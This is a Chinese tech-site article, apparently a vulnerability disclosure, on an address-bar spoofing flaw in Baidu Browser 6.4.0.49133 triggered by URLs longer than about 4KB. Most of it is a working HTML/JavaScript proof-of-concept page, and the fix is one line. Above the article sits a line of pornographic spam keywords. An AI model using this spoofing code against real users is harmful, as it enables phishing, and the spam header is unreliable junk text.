亚洲乱码中文字幕综合,中国熟女仑乱hd,亚洲精品乱拍国产一区二区三区,一本大道卡一卡二卡三乱码全集资源,又粗又黄又硬又爽的免费视频

瀏覽器漏洞 百度瀏覽器6.4.0.49133 偽造任意網址

  發(fā)布時間:2014-09-25 16:01:22   作者:佚名   我要評論
百度瀏覽器近期發(fā)現(xiàn)漏洞,百度瀏覽器6.4.0.49133 一旦域名、網址URL長度大于4KB時處理出錯,例如將證明文件保存為c:\a.htm并打開,點擊連接后可以偽造任意網,需要的朋友可以參考下

  百度瀏覽器近期發(fā)現(xiàn)漏洞,百度瀏覽器6.4.0.49133以及以前版本偽造任意網址漏洞,偽造任意協(xié)議(http/https/ftp...)、域名、網址URL長度大于4KB時處理出錯,例如將證明文件保存為c:\a.htm并打開,點擊連接后可以偽造任意網址。

  同時URL過長的時候,會顯示“已收藏”圖標,估計是處理過長url時邏輯有點小問題漏洞證明:


復制代碼
代碼如下:
  <html>
  <div id='c' style=''> //displaynone
  ss
  </div>
  <a href="#" target="newwin" id='v' style="display:block" onclick="invokePoC();window.open('javascript:1;','newwin');">just click me</a>
  <script>
  function invokePoC() {
  wx = open("http://www.baidu.com/account/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</p> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
","newwin");//setInterval("doit()",5000);
  }
  if(window.name == "newwin")
  {
  document.getElementById('c').innerText = ':). due to an internal error(>10Kbytes url), the fav icon will be shown. if you just want the shortest url, just make it for about 4KB';document.write("<title>:)</title>");
  document.getElementById('v').style.display = 'none';}
  </script>
  </html>

  修復方案:

  無效URL及時過濾,以防止偽造網址,謝謝閱讀,希望能幫到大家,請繼續(xù)關注腳本之家,我們會努力分享更多優(yōu)秀的文章。

相關文章

最新評論